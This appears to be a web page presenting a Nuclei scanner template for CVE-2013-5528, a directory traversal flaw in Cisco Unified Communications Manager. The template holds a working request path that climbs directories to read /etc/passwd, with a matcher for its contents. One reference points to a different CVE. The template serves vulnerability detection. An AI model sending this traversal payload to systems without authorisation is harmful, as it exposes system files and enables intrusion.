Skip to content

Cisco Unified Communications Manager 7/8/9 - Directory Traversal

ID: CVE-2013-5528

Severity: medium

Author: daffainfo

Tags: cve2013,cve,lfi,cisco,edb

A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815

id: CVE-2013-5528
info:
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
impact: |
Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system.
remediation: |
Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/40887
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2013-5528
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N
cvss-score: 4
cve-id: CVE-2013-5528
cwe-id: CWE-22
epss-score: 0.00534
epss-percentile: 0.74722
cpe: cpe:2.3:a:cisco:unified_communications_manager:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: cisco
product: unified_communications_manager
tags: cve2013,cve,lfi,cisco,edb
http:
- method: GET
path:
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100c4e2411739e8df420090137c478c06ddf895df0effc8d338e3e68037c6ccc3770220170c5a70877e994507dd35794724a2f814d175f4827669629997146e572cc5e2:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2013/CVE-2013-5528.yaml"

View on Github